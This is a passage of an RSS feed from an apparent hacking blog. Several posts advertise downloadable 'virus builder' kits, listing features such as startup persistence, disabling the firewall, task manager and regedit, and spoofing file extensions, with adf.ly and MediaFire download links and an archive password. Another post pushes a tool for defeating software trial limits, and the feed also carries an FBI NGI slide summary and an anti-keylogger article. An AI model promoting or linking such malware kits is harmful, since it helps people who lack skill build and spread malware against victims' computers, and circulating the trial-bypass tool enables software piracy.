&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2iRx5-JtSSip012E0jiKKQlo3qmHho__iJ3zmSQezGiSWCbDsXZxvScAsnhkTjG1yQt8zPC0W3ushR29ws-E6oPYVeJzh6O2XUTSQYSa8MV7nEslcrU36C-GoPJWfGQEI-1AAkN_0YrM/s1600/testing.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2iRx5-JtSSip012E0jiKKQlo3qmHho__iJ3zmSQezGiSWCbDsXZxvScAsnhkTjG1yQt8zPC0W3ushR29ws-E6oPYVeJzh6O2XUTSQYSa8MV7nEslcrU36C-GoPJWfGQEI-1AAkN_0YrM/s320/testing.png" width="320" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;DOWNLOAD:&lt;/b&gt;&lt;br /&gt;
http://adf.ly/CuiaK&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
PASSWORD:&lt;br /&gt;
openpass &lt;br /&gt;
&lt;br /&gt;
&lt;a href="https://www.virustotal.com/file/af3cb2df9e83817f6a56e9515919c4c6788a50dc40ff9d11ee2092491e125a64/analysis/1312909496/" target="_blank"&gt;VIRUSTOTAL&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVhTIX5EKMSPHDnskvIbquroNCKhWR-k78fViKctrJRUoIa9YPPf70ZN88ZrVp-wIUH0GxY0d34IOqXvzz3UMbgW8F8rnk2Q8-goJolqwggDUUfxBto8u7xkwvyEuAVmhaantcqaKyaBQ/s72-c/load_Emails.jpg" width="72"/></item><item><title>Super Virus Builder - Create your virus in seconds ! [MEDIAFIRE] </title><link>http://superhackings.blogspot.com/2015/08/super-virus-builder-create-your-virus.html</link><category>Computer Security</category><category>software</category><category>Virus</category><author>noreply@blogger.com (Megh Singh Jodha)</author><pubDate>Thu, 20 Aug 2015 19:36:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2055989097824833615.post-6972230875448403260</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="post-body"&gt;
&lt;div dir="ltr" style="text-align: left;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0nDwk4ECxplhjardpAcKEkMAZXA6S7xdP1Rq6v8OtTYRBQOI5jnRSJGNhKZi-ZREqa_t8YLOZekfZB28V9iesaHDbM577jfmM_3kPElVPiVIzGy0fQO6Ra4qoQsV5YFe4OuSre5FhmgE/s1600/ultimate+virus+maker.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0nDwk4ECxplhjardpAcKEkMAZXA6S7xdP1Rq6v8OtTYRBQOI5jnRSJGNhKZi-ZREqa_t8YLOZekfZB28V9iesaHDbM577jfmM_3kPElVPiVIzGy0fQO6Ra4qoQsV5YFe4OuSre5FhmgE/s1600/ultimate+virus+maker.png" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white; font-size: 1.1em; line-height: 1.5em; margin-bottom: 20px;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;strong&gt;&lt;br /&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white; font-size: 1.1em; line-height: 1.5em; margin-bottom: 20px;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;strong&gt;Information:&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white; font-size: 1.1em; line-height: 1.5em; margin-bottom: 20px;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
The next generation of virus builders has finally arrived.&amp;nbsp;Ultimate 
Virus Builder&amp;nbsp;offers you more than 50 options to customize your virus to
 your likings. You can even select your own icon for your virus ! Not 
only does this tool allow you to create your own virusses, it can also 
help you spoof the extension of any file with the built in extension 
spoofer !&amp;nbsp;Ultimate Virus Builder&amp;nbsp;has an automatic update system, so 
you’ll never have to worry about downloading the latest version, isn’t 
that awesome? You don’t need to be a computer ‘geek’ to create virusses,
 all you need is&amp;nbsp;Ultimate Virus Builder.&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white; font-size: 1.1em; line-height: 1.5em; margin-bottom: 20px;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;strong&gt;Options:&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;
&lt;ul style="background-color: white; font-size: 14px; line-height: 20px; list-style-position: inside; margin: 0px 0px 10px 21px; padding: 0px;"&gt;
&lt;li&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Custom message on execution&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Add to startup&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Disable clipboard&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Disable taskmanager&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Disable CMD&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Disable System Repair&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Disable Msconfig&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Disable Explorer&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Disable Regedit&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Switch mouse buttons&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Hide taskbar&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Disconnect from the internet&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Many more !&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span style="font-size: 14px; line-height: 20px;"&gt;&lt;b&gt;&lt;a href="http://www.mediafire.com/?jhh481yobw5p66z" target="_blank"&gt;DOWNLOAD&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0nDwk4ECxplhjardpAcKEkMAZXA6S7xdP1Rq6v8OtTYRBQOI5jnRSJGNhKZi-ZREqa_t8YLOZekfZB28V9iesaHDbM577jfmM_3kPElVPiVIzGy0fQO6Ra4qoQsV5YFe4OuSre5FhmgE/s72-c/ultimate+virus+maker.png" width="72"/></item><item><title>Time stopper v3.00 free (stop the time for any try-out version software and you can use them forever.) </title><link>http://superhackings.blogspot.com/2013/05/time-stopper-v300-free-stop-time-for.html</link><author>noreply@blogger.com (Megh Singh Jodha)</author><pubDate>Thu, 2 May 2013 13:21:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2055989097824833615.post-4577040356452694039</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;b&gt;Time stopper v3.00 free software forever.&lt;/b&gt;&lt;br /&gt;
&lt;span style="color: #6aa84f;"&gt;This has got to be one of the best programs on this forum&lt;/span&gt;&lt;span style="color: #6aa84f;"&gt;&lt;br style="font-family: Verdana, Arial, sans-serif; line-height: 22px;" /&gt;&lt;br style="font-family: Verdana, Arial, sans-serif; line-height: 22px;" /&gt;&lt;span style="font-family: Verdana, Arial, sans-serif; line-height: 22px;"&gt;Using this software you can stop the time for any try-out version software and you can use them forever.&lt;br /&gt;You stop the time of a try-out version using this Time Stopper it works via this Time Stopper. Real time &amp;amp; date&lt;br /&gt;run normally on your system.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;span style="font-family: Verdana, Arial, sans-serif; line-height: 22px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style="background-color: white;"&gt;&lt;span style="font-family: Verdana, Arial, sans-serif; line-height: 22px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://adf.ly/1135694/https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSTZP8moUPKzhcInvXHs_rkJ90NC8yy1PPs-q6OmQjh-k_fgeHuBKy10wMB30zt2pjPzzw3-pc1Ka1iafbM3hI9QH0H8bfvq8c9p7tImRNPaCbkOZYfGszFD93N8T2pn2FCg_rRxxDncI/s1600/00226372.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="time stopper v3.0 free" border="0" height="318" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSTZP8moUPKzhcInvXHs_rkJ90NC8yy1PPs-q6OmQjh-k_fgeHuBKy10wMB30zt2pjPzzw3-pc1Ka1iafbM3hI9QH0H8bfvq8c9p7tImRNPaCbkOZYfGszFD93N8T2pn2FCg_rRxxDncI/s320/00226372.jpg" title="time stopper v3.0" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="background-color: white;"&gt;&lt;span style="font-family: Verdana, Arial, sans-serif; line-height: 22px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style="background-color: #333333; color: limegreen; font-family: Verdana, Arial, sans-serif; line-height: 22px;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="background-color: white; color: limegreen; font-family: Verdana, Arial, sans-serif; line-height: 22px;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="background-color: white; color: limegreen; font-family: Verdana, Arial, sans-serif; line-height: 22px;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="background-color: white; color: limegreen; font-family: Verdana, Arial, sans-serif; line-height: 22px;"&gt;&lt;b&gt;&lt;a href="http://adf.ly/Ke3LQ" target="_blank"&gt;Download&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSTZP8moUPKzhcInvXHs_rkJ90NC8yy1PPs-q6OmQjh-k_fgeHuBKy10wMB30zt2pjPzzw3-pc1Ka1iafbM3hI9QH0H8bfvq8c9p7tImRNPaCbkOZYfGszFD93N8T2pn2FCg_rRxxDncI/s72-c/00226372.jpg" width="72"/></item><item><title>DeadLine's Virus Maker 1.8.5(Free Download) </title><link>http://superhackings.blogspot.com/2013/05/deadlines-virus-maker-185free-download.html</link><author>noreply@blogger.com (Megh Singh Jodha)</author><pubDate>Thu, 2 May 2013 13:16:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2055989097824833615.post-6223153839238222682</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
Hello !&lt;br /&gt;
&lt;br /&gt;
DeadLine's Virus Maker 1.8.5 is a virus maker that I made because I do 
not trust all the other virus makers that are out there on the net. I 
worked on this for 8+ hours in total.&lt;br /&gt;
This application lets you create virusses, and you do not need to be a computer "geek" to do this. All you need, is this tool.
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="text-decoration: underline;"&gt;&lt;span style="font-weight: bold;"&gt;Features:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;div class="spoiler_header"&gt;
&lt;a href="http://adf.ly/1135694/http://www.blogger.com/blogger.g?blogID=2112164836966994080"&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="spoiler_body" style="display: block;"&gt;
* Show a messagebox on startup&lt;br /&gt;
* Add to windows startup&lt;br /&gt;
* Close MSN&lt;br /&gt;
* Close Skype&lt;br /&gt;
* Close Yahoo&lt;br /&gt;
* Disable mouse&lt;br /&gt;
* Force shutdown&lt;br /&gt;
* Force restart&lt;br /&gt;
* Infinite beeping&lt;br /&gt;
* Infinite messageboxes&lt;br /&gt;
* Disconnect from the internet&lt;br /&gt;
* Disable firewall&lt;br /&gt;
* Disable CMD&lt;br /&gt;
* Disable taskmanager&lt;br /&gt;
* Disable regedit&lt;br /&gt;
* Random mouse movement&lt;br /&gt;
* Random keyboard keys sent&lt;br /&gt;
* Disable notepad&lt;br /&gt;
* And more !&lt;/div&gt;
&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;
&lt;span style="font-weight: bold;"&gt;&lt;span style="text-decoration: underline;"&gt;Screenshot:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-weight: bold;"&gt;&lt;span style="text-decoration: underline;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://adf.ly/1135694/https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRd8ntwC9-dNOQSFjbKj_B6K8siuJP0M7-DpYROgD1xuOxMmXzU1gwM6moCMlryC3ErP-_UDPdBktvDe3Re-S_OG3oDRKAmbLiw6YvqEgD5aDj6-KgYTpElk54n0KoFC-aCnUI_o4cTH4/s1600/dvm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRd8ntwC9-dNOQSFjbKj_B6K8siuJP0M7-DpYROgD1xuOxMmXzU1gwM6moCMlryC3ErP-_UDPdBktvDe3Re-S_OG3oDRKAmbLiw6YvqEgD5aDj6-KgYTpElk54n0KoFC-aCnUI_o4cTH4/s1600/dvm.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="font-weight: bold;"&gt;&lt;span style="text-decoration: underline;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-weight: bold;"&gt;&lt;span style="text-decoration: underline;"&gt;&lt;a href="http://adf.ly/KteSt" target="_blank"&gt;DOWNLOAD&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRd8ntwC9-dNOQSFjbKj_B6K8siuJP0M7-DpYROgD1xuOxMmXzU1gwM6moCMlryC3ErP-_UDPdBktvDe3Re-S_OG3oDRKAmbLiw6YvqEgD5aDj6-KgYTpElk54n0KoFC-aCnUI_o4cTH4/s72-c/dvm.png" width="72"/></item><item><title>FBI Criminal Justice Information Services Division Next Generation Identification</title><link>http://superhackings.blogspot.com/2013/02/fbi-criminal-justice-information.html</link><category>Computer Security</category><category>New technology in bio-metric identification</category><author>noreply@blogger.com (Megh Singh Jodha)</author><pubDate>Mon, 25 Feb 2013 11:43:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2055989097824833615.post-2725044515155180777</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="color: red;"&gt;FBI Criminal Justice Information Services Division Next Generation Identification&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: yellow;"&gt;Rap Back&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: lime;"&gt;Rapid Mobile&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: greenyellow;"&gt;Iris&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: cyan;"&gt;Facial&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: turquoise;"&gt;Latents&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: deepskyblue;"&gt;Palms&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioPLWgbeN6VoUtoxMRaojlSrb9PUcAZCXe1Su7UFKLdAogaH_KFGzNIB6a21oe-zOmBkVDE2EGJkPbGMAskX65t3jSa8lY1Eiur2I1oJ6DRwtqKLhdooLe107OlS9s721JME8Ajx9UTjQ/s1600/FBI-NGI-FOUO.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="Next Generation Identification " border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioPLWgbeN6VoUtoxMRaojlSrb9PUcAZCXe1Su7UFKLdAogaH_KFGzNIB6a21oe-zOmBkVDE2EGJkPbGMAskX65t3jSa8lY1Eiur2I1oJ6DRwtqKLhdooLe107OlS9s721JME8Ajx9UTjQ/s640/FBI-NGI-FOUO.jpg" title="FBI-NGI-FOUO" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="color: deepskyblue;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span style="color: red;"&gt;Universal Face Workstation (UFW)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
* FBI user software to support access to NGI Face Pilot and NGI System face search capabilities&lt;br /&gt;
* Cross Platform (Windows, OSX, Linux)&lt;br /&gt;
* Built upon a Biometric Integration Platform&lt;br /&gt;
* Built on open source frameworks&lt;br /&gt;
* Extensive support for plugins&lt;br /&gt;
* Will be available for Law Enforcement use free of charge&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: red;"&gt;UFW Objectives&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Plan, design, prototype and demonstrate a face workstation which can be freely deployed by the FBI&lt;br /&gt;
&lt;br /&gt;
* Develop services which can be carried over to NGI for biometric processing &lt;br /&gt;
&lt;br /&gt;
* Employ a user experience design philosophy to develop UFW specifically for face examiners&lt;br /&gt;
&lt;br /&gt;
Permit examiners to:&lt;br /&gt;
&lt;br /&gt;
* Ingest, analyze and enhance images&lt;br /&gt;
&lt;br /&gt;
* Select sub-frames or sub-images areas for further analysis&lt;br /&gt;
&lt;br /&gt;
* Submit files to local and remote matching systems&lt;br /&gt;
&lt;br /&gt;
* Review, store and match search results&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://adf.ly/JDNPu" target="_blank"&gt;&lt;b&gt;DOWNLOAD&amp;nbsp; &lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
PDF &amp;nbsp;30pg &amp;nbsp; 2.26mb
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioPLWgbeN6VoUtoxMRaojlSrb9PUcAZCXe1Su7UFKLdAogaH_KFGzNIB6a21oe-zOmBkVDE2EGJkPbGMAskX65t3jSa8lY1Eiur2I1oJ6DRwtqKLhdooLe107OlS9s721JME8Ajx9UTjQ/s72-c/FBI-NGI-FOUO.jpg" width="72"/></item><item><title>Anti-Keylogger For Life! with [SOURCE CODE]</title><link>http://superhackings.blogspot.com/2013/02/anti-keylogger-for-life-with-source-code.html</link><category>Anti-keylogger</category><category>antikeylogger source code</category><author>noreply@blogger.com (Megh Singh Jodha)</author><pubDate>Mon, 25 Feb 2013 11:41:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2055989097824833615.post-212964972099538958</guid><description>Introduction&amp;nbsp;&amp;nbsp;&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht4AphApixfGQoKf5y3wXIGe8pDEtcOvpUGVRjKx_VekrD-uyclzEil0E7TklyEvBw-q2uXBOhz3o7oNDQpI6AyPteSX3_GJzPOwTXmJUsWEq99LhppGCMcXtkV2umS2IzkXpbByEB5Qo/s1600/anti-keylogger.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht4AphApixfGQoKf5y3wXIGe8pDEtcOvpUGVRjKx_VekrD-uyclzEil0E7TklyEvBw-q2uXBOhz3o7oNDQpI6AyPteSX3_GJzPOwTXmJUsWEq99LhppGCMcXtkV2umS2IzkXpbByEB5Qo/s320/anti-keylogger.png" border="0" width="320" height="257"&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br&gt;&lt;span id="result_box" tabindex="-1" lang="en"&gt;&lt;span class="hps"&gt;If you usually&lt;/span&gt; &lt;span class="hps"&gt;typing&lt;/span&gt; &lt;span class="hps"&gt;a password&lt;/span&gt; &lt;span class="hps"&gt;in&lt;/span&gt; &lt;span class="hps"&gt;a desktop application&lt;/span&gt;, it &lt;span class="hps"&gt;may be that&lt;/span&gt; &lt;span class="hps"&gt;a keylogger&lt;/span&gt; &lt;span class="hps"&gt;spies out&lt;/span&gt; &lt;span class="hps"&gt;your secrets&lt;/span&gt;. &lt;span class="hps"&gt;This is obviously&lt;/span&gt; &lt;span class="hps"&gt;not good. &lt;/span&gt;&lt;span class="hps"&gt;Screen keyboards&lt;/span&gt; &lt;span class="hps"&gt;might&lt;/span&gt; &lt;span class="hps"&gt;be a good solution&lt;/span&gt;, but again, there &lt;span class="hps"&gt;could be a&lt;/span&gt; &lt;span class="hps"&gt;screen capture&lt;/span&gt; &lt;span class="hps"&gt;program&lt;/span&gt; which watches &lt;span class="hps"&gt;effortlessly&lt;/span&gt; &lt;span class="hps"&gt;your passwords&lt;/span&gt;. &lt;span class="hps"&gt;Furthermore,&lt;/span&gt; &lt;span class="hps"&gt;screen keyboards&lt;/span&gt; &lt;span class="hps"&gt;are&lt;/span&gt; &lt;span class="hps"&gt;relative unhandily&lt;/span&gt;.&lt;/span&gt;&lt;br&gt;

&lt;span id="result_box" tabindex="-1" lang="en"&gt;&lt;span class="hps"&gt;The following&lt;/span&gt; &lt;span class="hps"&gt;article&lt;/span&gt; presents&lt;span class="hps"&gt; a relatively simple&lt;/span&gt; &lt;span class="hps"&gt;principle&lt;/span&gt;, &lt;span class="hps"&gt;which&lt;/span&gt; prevents &lt;span class="hps"&gt;the keylogger&lt;/span&gt; &lt;span class="hps"&gt;to write down&lt;/span&gt; &lt;span class="hps"&gt;passwords entered&lt;/span&gt;. &lt;span class="hps"&gt;Basically, the&lt;/span&gt; used &lt;span class="hps"&gt;system&lt;/span&gt; i&lt;span class="hps"&gt;s&lt;/span&gt; &lt;span class="hps"&gt;surprisingly easy and&lt;/span&gt; &lt;span class="hps"&gt;can&lt;/span&gt; &lt;span class="hps"&gt;therefore be transferred to&lt;/span&gt; &lt;span class="hps"&gt;other programming&lt;/span&gt; &lt;span class="hps"&gt;/ operating systems&lt;/span&gt; &lt;span class="hps"&gt;/ platforms,&lt;/span&gt; &lt;span class="hps"&gt;although&lt;/span&gt; &lt;span class="hps"&gt;under&lt;/span&gt; &lt;span class="hps"&gt;a small&lt;/span&gt; &lt;span class="hps"&gt;limitation&lt;/span&gt;.&lt;/span&gt;&lt;br&gt;

&lt;h2&gt;
Background&amp;nbsp;&lt;/h2&gt;
The first question is: How can a program &lt;i&gt;hide &lt;/i&gt;keystrokes?
 Perhaps there are some difficult ways to do this, but most probable 
this is not possible. We create an assumption: Entered characters 
necessarily mean the keylogger sees them. And that's what we use against
 the keylogger.  &lt;br&gt;
The second question is: How can a program &lt;i&gt;generate&lt;/i&gt; keystrokes? This is normally possible. For example, we use in C# the class &lt;code&gt;SendKeys&lt;/code&gt;,
 which provides methods for sending keystrokes. By the way, there can be
 the mentioned limitation because a website has not the authorization to
 produce keystrokes.&lt;br&gt;
The third question is: How can we &lt;i&gt;combine&lt;/i&gt;

 these two statements? At every time when the user types a character, 
the program generates some keytrokes more. The keylogger write down all 
characters both from user and program, but only the user and the program
 know the entire password. Unauthorized third parties see only letter 
salad and they can not decrypt the main password.&lt;br&gt;
The fourth question is: Is this main system &lt;i&gt;100 % secure&lt;/i&gt;?
 Surprisingly and unfortunately no. The prinziple has many weak points, 
but there are also many solutions to close these gaps. I advise every 
developer to think about it before they add this concept to their code. 
Let me explain you the &lt;span id="result_box" lang="en"&gt;&lt;span class="hps"&gt;vulnerabilities and the solutions:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;ol&gt;
&lt;li&gt;&lt;span id="result_box" lang="en"&gt;
 Creating random keystrokes after every character allows attackers to 
reproduce the typed password. Therefore the program must create 
identical keystrokes. Then again the produced keystrokes should not be 
identical for all passwords. In summary, we need a algorithm, which 
produces for every character always the same keystrokes. In addition to 
this, the length of the generated keystrokes should vary.&lt;/span&gt; &lt;/li&gt;
&lt;li&gt;&lt;span id="result_box" lang="en"&gt;For
 all that, an attacker can create a table with all characters and their 
hash result either by reverse engineering or by testing. Using this 
table, he can decrypt the password relatively easy. To prevent this, the
 generated keystrokes should depend on a password identity, such as 
account name, account number, e-mail or computer specification. &lt;/span&gt;&lt;span id="result_box" lang="en"&gt;&lt;span class="hps"&gt;Unfortunately, this is&lt;/span&gt; &lt;span class="hps"&gt;only an obstacle&lt;/span&gt;, &lt;span class="hps"&gt;but&lt;/span&gt; &lt;span class="hps alt-edited"&gt;no blockage&lt;/span&gt; &lt;span class="hps"&gt;for&lt;/span&gt; &lt;span class="hps"&gt;attackers&lt;/span&gt;. &lt;/span&gt;&lt;span id="result_box" lang="en"&gt; &lt;/span&gt;&lt;span id="result_box" lang="en"&gt; &lt;/span&gt;&lt;/li&gt;

&lt;/ol&gt;
&lt;h2&gt;
Download&amp;nbsp;&lt;/h2&gt;
&lt;h4 style="text-align: left;"&gt;
&amp;nbsp;&lt;a href="http://adf.ly/J6BdG" target="_blank"&gt;Mediafire-download&lt;/a&gt;&lt;/h4&gt;
&lt;h4 style="text-align: left;"&gt;
&amp;nbsp;&lt;/h4&gt;
&lt;h4 style="text-align: left;"&gt;
&amp;nbsp;Credit: &lt;b&gt;Michael Hudak -&lt;/b&gt;SourceCode &lt;/h4&gt;
&amp;nbsp; 
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht4AphApixfGQoKf5y3wXIGe8pDEtcOvpUGVRjKx_VekrD-uyclzEil0E7TklyEvBw-q2uXBOhz3o7oNDQpI6AyPteSX3_GJzPOwTXmJUsWEq99LhppGCMcXtkV2umS2IzkXpbByEB5Qo/s72-c/anti-keylogger.png" width="72"/></item><item><title>Hack Google maps and google Earth</title><link>http://superhackings.blogspot.com/2012/10/hack-google-maps-and-google-earth.html</link><category>ebooks</category><author>noreply@blogger.com (Megh Singh Jodha)</author><pubDate>Mon, 8 Oct 2012 10:10:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2055989097824833615.post-5087631877984587646</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2sf1PtxwnwBBqk0o1FxSglz8Dz7hVrvJpruOVSF4Jy5HdFDfQpn7rNBF0nlNSRNq2RPGi4ODyKUrhIqKBRvyV2TpcJ8zMQ0EMWlXCF_W4uG5CMP0jhxcd-FaIp-sBHijKyf2n3iSnfWKP/s1600/hacking+google+maps+and+google+earth.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2sf1PtxwnwBBqk0o1FxSglz8Dz7hVrvJpruOVSF4Jy5HdFDfQpn7rNBF0nlNSRNq2RPGi4ODyKUrhIqKBRvyV2TpcJ8zMQ0EMWlXCF_W4uG5CMP0jhxcd-FaIp-sBHijKyf2n3iSnfWKP/s320/hacking+google+maps+and+google+earth.jpg" width="220" /&gt;&lt;/a&gt;&lt;/div&gt;
